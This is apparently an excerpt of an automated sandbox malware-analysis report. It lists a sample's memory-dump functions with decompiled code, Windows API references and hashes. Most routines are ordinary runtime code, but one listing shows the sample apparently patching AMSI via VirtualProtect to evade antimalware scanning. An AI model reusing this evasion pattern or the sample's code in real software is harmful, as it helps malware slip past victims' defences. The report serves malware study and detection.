0x0040c694
0x0040c6a0
0x0040c6a3
0x0040c6b9
0x0040c880
0x0040c885
0x0040c88b
0x0040c898
0x0040c898
0x0040c6c8
0x0040c6cf
0x0040c6d4
0x0040c6da
0x0040c6dd
0x0040c6e3
0x0040c6e8
0x0040c6ee
0x0040c6f0
0x0040c6f6
0x0040c6f6
0x0040c678
0x0040c730
0x0040c730
0x0040c734
0x0040c740
0x0040c74b
0x0040c752
0x0040c756
0x0040c75d
0x0040c766
0x0040c76d
0x0040c774
0x0040c77b
0x0040c780
0x0040c787
0x0040c78c
0x0040c792
0x0040c795
0x0040c79d
0x0040c7a1
0x0040c7a5
0x0040c7af
0x0040c7af
0x0040c7b9
0x00000000

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
_, xrefs: 0040C687
Z__, xrefs: 0040C7B2

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_
API String ID: 39653677-182788727
Opcode ID: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
Instruction ID: dc1124b8df5cbeb599ce563203a7e1262d4f469b331ea61f697e63e652aea6c4
Opcode Fuzzy Hash: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
Instruction Fuzzy Hash: 0151F871D052198BDB20DF69C8943DEBBF0AF85304F0481AED848BB391DB795A888F85

Uniqueness

Uniqueness Score: -1.00%

Function 00411C90 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411C99

Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E

Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414740
Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414779

SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040E202), ref: 00411CDD
realloc.MSVCRT ref: 00411D07
realloc.MSVCRT ref: 00411D1D
memset.NTDLL ref: 00411D4B
memset.NTDLL ref: 00411D69

Part of subcall function 00414660: Sleep.KERNEL32 ref: 00414698

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Sleep$ErrorLastmemsetrealloc$Value
String ID:
API String ID: 2283913283-0
Opcode ID: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
Instruction ID: ae9a74b205b84ac027549f7f7f86efa9fe3e638cf07f69e35c76b9f64c0e4442
Opcode Fuzzy Hash: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
Instruction Fuzzy Hash: EE31F4B4A042098FCB00EF69D484A9DBBF4FF88354F11456EE948DB311D738E981CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC00 Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040CC00(intOrPtr* _a4) {
				char _v12;
				intOrPtr _v24;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr* _t18;
				intOrPtr _t19;
				intOrPtr* _t22;

				_t18 = _a4;
				_t12 =  *((intOrPtr*)( *_t18));
				if(_t12 > 0xc0000091) {
					if(_t12 == 0xc0000094) {
						_t19 = 0;
						L12:
						_v24 = 0;
						 *_t22 = 8;
						L0040EEF0();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t22 = 8;
							L0040EEF0();
							if(_t19 != 0) {
								E0040D3A0(_t12);
							}
							L15:
							_t13 = 0xffffffff;
							L16:
							return _t13;
						}
						if(_t12 == 0) {
							L9:
							_t13 =  *0x422064; // 0x0
							if(_t13 == 0) {
								goto L16;
							}
							_a4 = _t18;
							_t22 =  &_v12;
							_pop(_t18);
							goto __eax;
						}
						 *_t22 = 8;
						 *_t12();
						goto L15;
					}
					if(_t12 == 0xc0000096) {
						L19:
						_v24 = 0;
						 *_t22 = 4;
						L0040EEF0();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t22 = 4;
							L0040EEF0();
							goto L15;
						}
						if(_t12 == 0) {
							goto L9;
						}
						 *_t22 = 4;
						 *_t12();
						goto L15;
					}
					if(_t12 == 0xc0000093) {
						L17:
						_t19 = 1;
						goto L12;
					}
					goto L9;
				}
				if(_t12 >= 0xc000008d) {
					goto L17;
				}
				if(_t12 != 0xc0000005) {
					if(_t12 != 0xc000001d) {
						goto L9;
					}
					goto L19;
				}
				_v24 = 0;
				 *_t22 = 0xb;
				L0040EEF0();
				if(_t12 == 1) {
					_v24 = 1;
					 *_t22 = 0xb;
					L0040EEF0();
					goto L15;
				}
				if(_t12 == 0) {
					goto L9;
				}
				 *_t22 = 0xb;
				 *_t12();
				goto L15;
			}

0x0040cc08
0x0040cc0d
0x0040cc14
0x0040cc5d
0x0040cc81
0x0040cc83
0x0040cc83
0x0040cc8b
0x0040cc92
0x0040cc9a
0x0040cd26
0x0040cd2e
0x0040cd35
0x0040cd3c
0x0040cd42
0x0040cd42
0x0040ccad
0x0040ccad
0x0040ccb2
0x0040ccb8
0x0040ccb8
0x0040cca2
0x0040cc6d
0x0040cc6d
0x0040cc74
0x00000000
0x00000000
0x0040cc76
0x0040cc79
0x0040cc7c
0x0040cc7f
0x0040cc7f
0x0040cca4
0x0040ccab
0x00000000
0x0040ccab
0x0040cc64
0x0040ccce
0x0040ccce
0x0040ccd6
0x0040ccdd
0x0040cce5
0x0040cd10
0x0040cd18
0x0040cd1f
0x00000000
0x0040cd1f
0x0040cce9
0x00000000
0x00000000
0x0040cceb
0x0040ccf2
0x00000000
0x0040ccf2
0x0040cc6b
0x0040ccc0
0x0040ccc0
0x00000000
0x0040ccc0
0x00000000
0x0040cc6b
0x0040cc1b
0x00000000
0x00000000
0x0040cc26
0x0040cccc
0x00000000
0x00000000
0x00000000
0x0040cccc
0x0040cc2c
0x0040cc34
0x0040cc3b
0x0040cc43
0x0040ccf6
0x0040ccfe
0x0040cd05
0x00000000
0x0040cd05
0x0040cc4b
0x00000000
0x00000000
0x0040cc4d
0x0040cc54
0x00000000

APIs

signal.MSVCRT ref: 0040CC3B
signal.MSVCRT ref: 0040CC92
signal.MSVCRT ref: 0040CCDD
signal.MSVCRT ref: 0040CD05

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
Instruction ID: d8b5130f18038d3c219e8aaee35d86da13098021128de2a3e6af161d937793ff
Opcode Fuzzy Hash: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
Instruction Fuzzy Hash: 69217E7110C200CAF7206F65C5C436FB6A0AB45758F114E2BD989E73C1C77D8884979B

Uniqueness

Uniqueness Score: -1.00%

Function 00416590 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
InterlockedDecrement.KERNEL32 ref: 004165B9
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416607
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416616

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DecrementInterlocked
String ID:
API String ID: 1781445796-0
Opcode ID: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
Instruction ID: f1d07c7601fc08a455496ddd5bfcc69915974a3964eaa512498397c80aedb5d4
Opcode Fuzzy Hash: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
Instruction Fuzzy Hash: 2621C7B5A042089FCB00EFB9E58849DBBF0EB48360F01852AEC98D7310E734E955CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00412EC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00412EC0(signed int __ecx, void* __edx, void* __edi, char* _a4, signed int _a8) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char* _v28;
				char _v32;
				intOrPtr _v52;
				char* _v56;
				void* __ebx;
				void* __esi;
				void* __ebp;
				char* _t46;
				signed int _t48;
				char* _t49;
				void* _t51;
				char* _t52;
				int _t53;
				signed int _t54;
				intOrPtr _t55;
				char* _t56;
				char* _t61;
				char* _t71;
				long _t77;
				char* _t78;
				char* _t81;
				signed int _t84;
				void* _t86;
				void* _t88;
				char* _t89;
				char** _t92;
				char** _t93;

				_t88 = __edi;
				_t86 = __edx;
				_t85 = __ecx;
				_t46 =  *0x422414; // 0xe72568
				_v28 = 0;
				_t89 = _a4;
				_v24 = 0;
				_v20 = 0xfeedbab1;
				_v16 = 1;
				if(_t46 == 0) {
					_v52 = 0x40ef40;
					_v56 = 4;
					 *_t92 = "mtx_pthr_locked_shmem";
					_t46 = E00414330(__eflags);
					 *0x422414 = _t46;
				}
				 *_t92 = _t46;
				E00413FD0();
				 *_t92 = _t89;
				_t48 = E004107C0(_t86);
				_t84 = _t48;
				if(_t48 == 0) {
					L4:
					_t49 =  *0x422414; // 0xe72568
					if(_t49 == 0) {
						_v52 = 0x40ef40;
						_v56 = 4;
						 *_t92 = "mtx_pthr_locked_shmem";
						_t49 = E00414330(__eflags);
						 *0x422414 = _t49;
					}
					 *_t92 = _t49;
					E00413A00(_t85);
					_t51 = 3;
					goto L6;
				} else {
					_t52 =  *(_t48 + 0x14);
					if(_t52 == 0) {
						goto L4;
					} else {
						_v56 =  &_v32;
						 *_t92 = _t52;
						_t53 = GetHandleInformation(??, ??);
						_t92 = _t92 - 8;
						if(_t53 != 0) {
							__eflags =  *(_t84 + 0x24) & 0x00000004;
							if(( *(_t84 + 0x24) & 0x00000004) == 0) {
								_t54 = E004102F0(_t84, _t85,  &_v32, _t88, _t89);
								__eflags = _t54;
								if(_t54 == 0) {
									_t55 = 0;
								} else {
									_t55 =  *((intOrPtr*)(_t54 + 0xbc));
								}
								__eflags = _t89 - _t55;
								if(_t89 == _t55) {
									_t56 =  *0x422414; // 0xe72568
									__eflags = _t56;
									if(__eflags == 0) {
										_v52 = 0x40ef40;
										_v56 = 4;
										 *_t92 = "mtx_pthr_locked_shmem";
										_t56 = E00414330(__eflags);
										 *0x422414 = _t56;
									}
									 *_t92 = _t56;
									E00413A00(_t85);
									_t51 = 0x24;
								} else {
									__eflags =  *(_t84 + 0x70);
									if( *(_t84 + 0x70) != 0) {
										L22:
										 *_t92 =  *(_t84 + 0x14);
										CloseHandle(??);
										_t61 =  *(_t84 + 0x18);
										_t93 = _t92 - 4;
										__eflags = _t61;
										if(_t61 != 0) {
											 *_t93 = _t61;
											CloseHandle(??);
											_t93 = _t93 - 4;
										}
										 *(_t84 + 0x18) = 0;
										__eflags = _a8;
										if(_a8 != 0) {
											_t85 = _a8;
											 *_a8 =  *((intOrPtr*)(_t84 + 4));
										}
										_t30 = _t84 + 0x1c; // 0x1c
										 *_t93 = _t30;
										E004140E0();
										 *(_t84 + 0x34) = _v28;
										__eflags =  *(_t84 + 0xb8);
										 *(_t84 + 0x38) = _v24;
										 *((intOrPtr*)(_t84 + 0x3c)) = _v20;
										 *((intOrPtr*)(_t84 + 0x40)) = _v16;
										if( *(_t84 + 0xb8) == 0) {
											E0040FD20(_t84);
										}
										_t71 =  *0x422414; // 0xe72568
										__eflags = _t71;
										if(__eflags == 0) {
											_v52 = 0x40ef40;
											_v56 = 4;
											 *_t93 = "mtx_pthr_locked_shmem";
											_t71 = E00414330(__eflags);
											 *0x422414 = _t71;
										}
										 *_t93 = _t71;
										E00413A00(_t85);
										E00412210();
										_t51 = 0;
									} else {
										_v56 = 0;
										 *_t92 =  *(_t84 + 0x14);
										_t77 = WaitForSingleObject(??, ??);
										_t92 = _t92 - 8;
										__eflags = _t77;
										if(_t77 == 0) {
											goto L22;
										} else {
											_t78 =  *0x422414; // 0xe72568
											__eflags = _t78;
											if(__eflags == 0) {
												_v52 = 0x40ef40;
												_v56 = 4;
												 *_t92 = "mtx_pthr_locked_shmem";
												_t78 = E00414330(__eflags);
												 *0x422414 = _t78;
											}
											 *_t92 = _t78;
											E00413A00(_t85);
											E00412210();
											_t51 = 0x10;
										}
									}
								}
								L6:
								return _t51;
							} else {
								_t81 =  *0x422414; // 0xe72568
								__eflags = _t81;
								if(__eflags == 0) {
									_v52 = 0x40ef40;
									_v56 = 4;
									 *_t92 = "mtx_pthr_locked_shmem";
									_t81 = E00414330(__eflags);
									 *0x422414 = _t81;
								}
								 *_t92 = _t81;
								E00413A00(_t85);
								return 0x16;
							}
						} else {
							goto L4;
						}
					}
				}
			}

0x00412ec0
0x00412ec0
0x00412ec0
0x00412ec8
0x00412ecd
0x00412ed4
0x00412ed7
0x00412ede
0x00412ee7
0x00412eee
0x00412f93
0x00412f9b
0x00412fa3
0x00412faa
0x00412faf
0x00412faf
0x00412ef4
0x00412ef7
0x00412efc
0x00412eff
0x00412f06
0x00412f08
0x00412f28
0x00412f28
0x00412f2f
0x00412f70
0x00412f78
0x00412f80
0x00412f87
0x00412f8c
0x00412f8c
0x00412f31
0x00412f34
0x00412f39
0x00000000
0x00412f0a
0x00412f0a
0x00412f0f
0x00000000
0x00412f11
0x00412f14
0x00412f18
0x00412f1b
0x00412f21
0x00412f26
0x00412f45
0x00412f49
0x00412fc0
0x00412fc5
0x00412fc7
0x004130e6
0x00412fcd
0x00412fcd
0x00412fcd
0x00412fd3
0x00412fd5
0x00413047
0x0041304c
0x0041304e
0x004130ed
0x004130f5
0x004130fd
0x00413104
0x00413109
0x00413109
0x00413054
0x00413057
0x0041305c
0x00412fd7
0x00412fda
0x00412fdc
0x00413066
0x0041306f
0x00413072
0x00413074
0x00413077
0x0041307a
0x0041307c
0x0041307e
0x00413081
0x00413083
0x00413083
0x00413089
0x00413090
0x00413092
0x00413097
0x0041309a
0x0041309a
0x0041309c
0x0041309f
0x004130a2
0x004130b0
0x004130b6
0x004130b8
0x004130be
0x004130c4
0x004130c7
0x00413138
0x00413138
0x004130c9
0x004130ce
0x004130d0
0x00413113
0x0041311b
0x00413123
0x0041312a
0x0041312f
0x0041312f
0x004130d2
0x004130d5
0x004130da
0x004130df
0x00412fe2
0x00412fe2
0x00412fed
0x00412ff0
0x00412ff6
0x00412ff9
0x00412ffb
0x00000000
0x00412ffd
0x00412ffd
0x00413002
0x00413004
0x0041313f
0x00413147
0x0041314f
0x00413156
0x0041315b
0x0041315b
0x0041300a
0x0041300d
0x00413012
0x00413017
0x00413017
0x00412ffb
0x00412fdc
0x00412f3e
0x00412f44
0x00412f4b
0x00412f4b
0x00412f50
0x00412f52
0x00413021
0x00413029
0x00413031
0x00413038
0x0041303d
0x0041303d
0x00412f58
0x00412f5b
0x00412f6b
0x00412f6b
0x00000000
0x00000000
0x00000000
0x00412f26
0x00412f0f

APIs

GetHandleInformation.KERNEL32 ref: 00412F1B
WaitForSingleObject.KERNEL32 ref: 00412FF0

Strings

h%, xrefs: 00412EC8, 00412F28, 00412F4B, 00412F8C, 00412FAF, 00412FFD, 0041303D, 00413047, 004130C9, 00413109, 0041312F, 0041315B

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: HandleInformationObjectSingleWait
String ID: h%
API String ID: 77340887-2361359942
Opcode ID: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
Instruction ID: 5295104ccd4e77eb4c30db888a1abb3289d5021b4c5d851bebd00781382d59b2
Opcode Fuzzy Hash: d317a26b3cd460a8ecd9a6efaadd092c3b0c37b6c9f4cd4961985edcf548a9ad
Instruction Fuzzy Hash: 4F618EB06043059FDB10EF65D68439ABFF4AF04344F40882EE884DB345D7B8D982CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00410A40 Relevance: 8.9, APIs: 7, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00410A9C
CloseHandle.KERNEL32 ref: 00410AD3
CloseHandle.KERNEL32 ref: 00410AE2
TlsSetValue.KERNEL32 ref: 00410B40

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseHandleValue
String ID:
API String ID: 492146193-0
Opcode ID: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
Instruction ID: 807a0fc4849867346c23f955af7b1b9f8301ac30692e4abd2189dee9186e86bd
Opcode Fuzzy Hash: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
Instruction Fuzzy Hash: 3F512BB0A04305CFDB10EFA5D58879A7BF4AF04344F01856AD8458B355E7B8E9C5CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 10002502 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(10004070,00000000), ref: 10002509
GetProcAddress.KERNEL32(00000000,10004078), ref: 10002525
VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 10002560
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 10002581

Strings

AMSI, xrefs: 1000254C

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: AMSI
API String ID: 3300690313-3828877684
Opcode ID: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
Instruction ID: f7beab1cd16fb010797eaf1f52ccd341b116c57276f54c1637b54f9798f26af1
Opcode Fuzzy Hash: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
Instruction Fuzzy Hash: 1C11DAB5D05209EFEB04CF94CC98BAEBBB4FB48345F108599EA11A7344D770AA40DB55

Uniqueness

Uniqueness Score: -1.00%

Function 04009290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04009290() {
				char _v8;
				_Unknown_base(*)()* _v12;

				_v8 = 0;
				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				if(_v12 != 0) {
					_v12(GetCurrentProcess(),  &_v8);
				}
				return _v8;
			}

0x04009296
0x040092b4
0x040092bb
0x040092c8
0x040092c8
0x040092d1

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 040092A7
GetProcAddress.KERNEL32(00000000), ref: 040092AE
GetCurrentProcess.KERNEL32(00000000), ref: 040092C1

Strings

kernel32.dll, xrefs: 040092A2
IsWow64Process, xrefs: 0400929D

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
Instruction ID: 4f9345edf5834c8cb0bc8acfac962fe0122c83c58fee2cee7c9637e45e33d241
Opcode Fuzzy Hash: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
Instruction Fuzzy Hash: D5E09275D04308EBEB04DFF4D94DB9D7B78EB08205F504694E545B2140D6786A54CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04007250 Relevance: 7.6, APIs: 5, Instructions: 113
registrytimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E04007250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				char* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v40;
				int _v44;
				int _v48;
				char _v64;
				signed int _v68;
				intOrPtr* _v72;
				struct _SYSTEMTIME _v88;
				char* _t58;
				intOrPtr* _t68;
				short* _t69;
				signed int _t70;
				intOrPtr* _t91;
				void* _t97;
				void* _t100;
				intOrPtr* _t101;

				_v5 = 1;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
					L12:
					return _v5;
				} else {
					_v24 = E040016F0(_a8, _a12);
					_t58 =  *0x40118a0; // 0x4013b88
					_v12 = _t58;
					E04007D20(_t58,  &_v40, 0, 0x10);
					wsprintfA( &_v40, "%u", _v24);
					_t100 = _t97 + 0x20;
					_v16 = 0x80000001;
					if(( *0x401435a & 0x000000ff) != 0) {
						_v16 = 0x80000002;
					}
					_v20 = 0;
					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
						_v48 = 0x10;
						_v44 = 0x10;
						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
							_v72 =  &_v64;
							GetLocalTime( &_v88);
							_t91 = _v72;
							_t101 = _t100 - 0x10;
							_t68 = _t101;
							 *_t68 =  *_t91;
							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
							_t69 = _t101 - 0x10;
							 *_t69 = _v88.wYear;
							_t69[2] = _v88.wDayOfWeek;
							_t69[4] = _v88.wHour;
							_t69[6] = _v88.wSecond;
							_t70 = E04009910();
							asm("cdq");
							_v68 = _t70 / 0x3c;
							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
								_v5 = 0;
							}
						}
						RegCloseKey(_v20);
					}
					goto L12;
				}
			}

0x04007256
0x0400725e
0x040073af
0x040073b5
0x04007285
0x04007295
0x04007298
0x0400729d
0x040072a8
0x040072bd
0x040072c3
0x040072c6
0x040072d6
0x040072d8
0x040072d8
0x040072df
0x04007301
0x04007307
0x0400730e
0x04007331
0x0400733c
0x04007343
0x04007349
0x0400734c
0x0400734f
0x04007353
0x04007358
0x0400735e
0x04007364
0x0400736a
0x0400736f
0x04007374
0x0400737a
0x04007380
0x04007383
0x0400738b
0x04007393
0x0400739f
0x040073a1
0x040073a1
0x0400739f
0x040073a9
0x040073a9
0x00000000
0x04007301

APIs

wsprintfA.USER32 ref: 040072BD
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 040072F9
RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 04007329
GetLocalTime.KERNEL32(?), ref: 04007343
RegCloseKey.ADVAPI32(00000000), ref: 040073A9

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

